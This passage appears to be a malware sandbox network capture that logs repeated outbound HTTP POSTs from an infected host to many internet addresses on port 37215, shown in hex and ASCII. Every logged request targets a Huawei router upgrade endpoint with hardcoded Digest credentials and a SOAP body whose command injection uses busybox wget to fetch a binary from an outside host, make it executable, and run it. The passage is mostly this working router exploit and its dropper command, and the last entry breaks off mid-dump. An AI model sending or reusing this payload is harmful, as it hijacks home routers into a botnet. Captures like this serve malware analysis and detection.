                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            253192.168.2.1558974197.149.210.20537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.179052114 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            254192.168.2.1554316197.47.91.23237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.179081917 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            255192.168.2.1552994197.15.43.16537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.179104090 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            256192.168.2.1549438197.151.36.25237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.179152966 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            257192.168.2.1538082197.170.31.6137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.179157019 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            258192.168.2.1532898197.123.74.9237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.179179907 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            259192.168.2.1538088197.140.251.19837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.179224968 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            260192.168.2.1538824197.190.223.3737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.179250002 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            261192.168.2.1539858197.111.152.8137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.179272890 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            262192.168.2.1556902197.23.145.8237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.179300070 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 